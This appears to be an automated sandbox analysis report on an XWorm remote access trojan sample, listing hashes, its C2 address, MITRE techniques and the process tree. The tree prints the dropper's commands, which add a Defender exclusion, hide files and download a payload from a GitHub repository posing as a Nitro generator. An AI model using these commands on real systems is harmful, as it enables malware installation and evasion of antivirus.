xworm | d595ab589662812007b211536b921b25367411546fbda83d33fa7ef29e9e7d6c

Analysis

max time kernel
297s
max time network
300s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-12-2024 11:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Obekräftade 999014.zip
Size

8.5MB
MD5

2527f8ae11ff8284413efbafd309eebe
SHA1

0448d5f8e6127247cf928e3bc5f8c36a4a6b7166
SHA256

d595ab589662812007b211536b921b25367411546fbda83d33fa7ef29e9e7d6c
SHA512

7b01d5e244ea7e55f3a0f71d4f2ce3be105b9d268190e9999bb32aca4017a5096b02fb3c04b4826a54906a6005de66ca949b4232f10161b6c4016a6a5d2249bc
SSDEEP

196608:qvtyXaw/YhZIIdyMGkXmyQscGZ0UDh9eAxcqctMy4yU:qFyqEqIIdyMGkXUscGFDh9eAxYlU

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

45.83.246.140:30120

Attributes

Install_directory
%AppData%
install_file
runtime.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0006000000040f84-75.dat	family_xworm
behavioral1/memory/1960-86-0x00000000001D0000-0x00000000001E8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	1832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4036	powershell.exe
1520	powershell.exe
1832	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation	upx.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.lnk	pack.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.lnk	pack.exe

Executes dropped EXE 2 IoCs

pid	Process
1492	upx.exe
1960	pack.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\runtime = "C:\\Users\\Admin\\AppData\\Roaming\\runtime.exe"	pack.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
23	raw.githubusercontent.com
37	raw.githubusercontent.com

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\7cb6d0c4-5223-4e49-afb1-1acca9dfc9ef.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241204120041.pma	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000_Classes\Local Settings	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000_Classes\Local Settings	OpenWith.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
2432	NOTEPAD.EXE
1336	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1960	pack.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

pid	Process
4036	powershell.exe
4036	powershell.exe
1520	powershell.exe
1520	powershell.exe
1832	powershell.exe
1832	powershell.exe
4616	7zFM.exe
4616	7zFM.exe
4616	7zFM.exe
4616	7zFM.exe
1492	upx.exe
4616	7zFM.exe
4616	7zFM.exe
1960	pack.exe
4316	msedge.exe
4316	msedge.exe
2760	msedge.exe
2760	msedge.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
5084	identity_helper.exe
5084	identity_helper.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
1960	pack.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4616	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe
2760	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4616	7zFM.exe
Token: 35	4616	7zFM.exe
Token: SeSecurityPrivilege	4616	7zFM.exe
Token: SeDebugPrivilege	4036	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeIncreaseQuotaPrivilege	1520	powershell.exe
Token: SeSecurityPrivilege	1520	powershell.exe
Token: SeTakeOwnershipPrivilege	1520	powershell.exe
Token: SeLoadDriverPrivilege	1520	powershell.exe
Token: SeSystemProfilePrivilege	1520	powershell.exe
Token: SeSystemtimePrivilege	1520	powershell.exe
Token: SeProfSingleProcessPrivilege	1520	powershell.exe
Token: SeIncBasePriorityPrivilege	1520	powershell.exe
Token: SeCreatePagefilePrivilege	1520	powershell.exe
Token: SeBackupPrivilege	1520	powershell.exe
Token: SeRestorePrivilege	1520	powershell.exe
Token: SeShutdownPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeSystemEnvironmentPrivilege	1520	powershell.exe
Token: SeRemoteShutdownPrivilege	1520	powershell.exe
Token: SeUndockPrivilege	1520	powershell.exe
Token: SeManageVolumePrivilege	1520	powershell.exe
Token: 33	1520	powershell.exe
Token: 34	1520	powershell.exe
Token: 35	1520	powershell.exe
Token: 36	1520	powershell.exe
Token: SeDebugPrivilege	1832	powershell.exe
Token: SeDebugPrivilege	1492	upx.exe
Token: SeIncreaseQuotaPrivilege	1492	upx.exe
Token: SeSecurityPrivilege	1492	upx.exe
Token: SeTakeOwnershipPrivilege	1492	upx.exe
Token: SeLoadDriverPrivilege	1492	upx.exe
Token: SeSystemProfilePrivilege	1492	upx.exe
Token: SeSystemtimePrivilege	1492	upx.exe
Token: SeProfSingleProcessPrivilege	1492	upx.exe
Token: SeIncBasePriorityPrivilege	1492	upx.exe
Token: SeCreatePagefilePrivilege	1492	upx.exe
Token: SeBackupPrivilege	1492	upx.exe
Token: SeRestorePrivilege	1492	upx.exe
Token: SeShutdownPrivilege	1492	upx.exe
Token: SeDebugPrivilege	1492	upx.exe
Token: SeSystemEnvironmentPrivilege	1492	upx.exe
Token: SeRemoteShutdownPrivilege	1492	upx.exe
Token: SeUndockPrivilege	1492	upx.exe
Token: SeManageVolumePrivilege	1492	upx.exe
Token: 33	1492	upx.exe
Token: 34	1492	upx.exe
Token: 35	1492	upx.exe
Token: 36	1492	upx.exe
Token: SeSecurityPrivilege	4616	7zFM.exe
Token: SeSecurityPrivilege	4616	7zFM.exe
Token: SeIncreaseQuotaPrivilege	1492	upx.exe
Token: SeSecurityPrivilege	1492	upx.exe
Token: SeTakeOwnershipPrivilege	1492	upx.exe
Token: SeLoadDriverPrivilege	1492	upx.exe
Token: SeSystemProfilePrivilege	1492	upx.exe
Token: SeSystemtimePrivilege	1492	upx.exe
Token: SeProfSingleProcessPrivilege	1492	upx.exe
Token: SeIncBasePriorityPrivilege	1492	upx.exe
Token: SeCreatePagefilePrivilege	1492	upx.exe
Token: SeBackupPrivilege	1492	upx.exe
Token: SeRestorePrivilege	1492	upx.exe
Token: SeShutdownPrivilege	1492	upx.exe
Token: SeDebugPrivilege	1492	upx.exe

Suspicious use of FindShellTrayWindow 38 IoCs

pid	Process
4616	7zFM.exe
4616	7zFM.exe
4616	7zFM.exe
4616	7zFM.exe
4616	7zFM.exe
2760	msedge.exe
2760	msedge.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe
3112	taskmgr.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1708	OpenWith.exe
1960	pack.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 2780	4616	7zFM.exe	88
PID 4616 wrote to memory of 2780	4616	7zFM.exe	88
PID 2780 wrote to memory of 4876	2780	cmd.exe	91
PID 2780 wrote to memory of 4876	2780	cmd.exe	91
PID 2780 wrote to memory of 4036	2780	cmd.exe	92
PID 2780 wrote to memory of 4036	2780	cmd.exe	92
PID 2780 wrote to memory of 4736	2780	cmd.exe	93
PID 2780 wrote to memory of 4736	2780	cmd.exe	93
PID 2780 wrote to memory of 1520	2780	cmd.exe	94
PID 2780 wrote to memory of 1520	2780	cmd.exe	94
PID 2780 wrote to memory of 3320	2780	cmd.exe	96
PID 2780 wrote to memory of 3320	2780	cmd.exe	96
PID 2780 wrote to memory of 1832	2780	cmd.exe	97
PID 2780 wrote to memory of 1832	2780	cmd.exe	97
PID 2780 wrote to memory of 1492	2780	cmd.exe	98
PID 2780 wrote to memory of 1492	2780	cmd.exe	98
PID 2780 wrote to memory of 4292	2780	cmd.exe	99
PID 2780 wrote to memory of 4292	2780	cmd.exe	99
PID 4616 wrote to memory of 2432	4616	7zFM.exe	100
PID 4616 wrote to memory of 2432	4616	7zFM.exe	100
PID 1708 wrote to memory of 1336	1708	OpenWith.exe	103
PID 1708 wrote to memory of 1336	1708	OpenWith.exe	103
PID 1492 wrote to memory of 1960	1492	upx.exe	104
PID 1492 wrote to memory of 1960	1492	upx.exe	104
PID 2760 wrote to memory of 2112	2760	msedge.exe	107
PID 2760 wrote to memory of 2112	2760	msedge.exe	107
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108
PID 2760 wrote to memory of 2368	2760	msedge.exe	108

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3320	attrib.exe
4292	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Obekräftade 999014.zip"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zO80285048\start.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Windows\system32\mode.com
    mode con: cols=100 lines=30
    3⤵
    PID:4876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -command ""
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4036
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:4736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\system32\attrib.exe
    attrib +h "Anon" /s /d
    3⤵
    - Views/modifies file attributes
    PID:3320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/sfd11/Nitro-Generator/refs/heads/main/src/utils/upx.exe' -OutFile upx.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1832
- - C:\Users\Admin\AppData\Local\Anon\upx.exe
    upx.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - C:\Users\Admin\AppData\Local\Temp\pack.exe
      "C:\Users\Admin\AppData\Local\Temp\pack.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:1960
- - C:\Windows\system32\attrib.exe
    attrib +h "C:\Users\Admin\AppData\Local\Anon\upx.exe" /s /d
    3⤵
    - Views/modifies file attributes
    PID:4292
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO802A3268\requirements.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2432

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO802E7508\README.md
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1336

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\OutEdit.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff9e5ad46f8,0x7ff9e5ad4708,0x7ff9e5ad4718
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
  2⤵
  PID:2368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:3796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:1
  2⤵
  PID:4236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4348 /prefetch:1
  2⤵
  PID:2764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  2⤵
  PID:3408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  PID:4824
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:3760
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff7e6475460,0x7ff7e6475470,0x7ff7e6475480
    3⤵
    PID:2780
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:3432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
  2⤵
  PID:1652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,4072191431801218263,12871705705453471113,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1
  2⤵
  PID:224
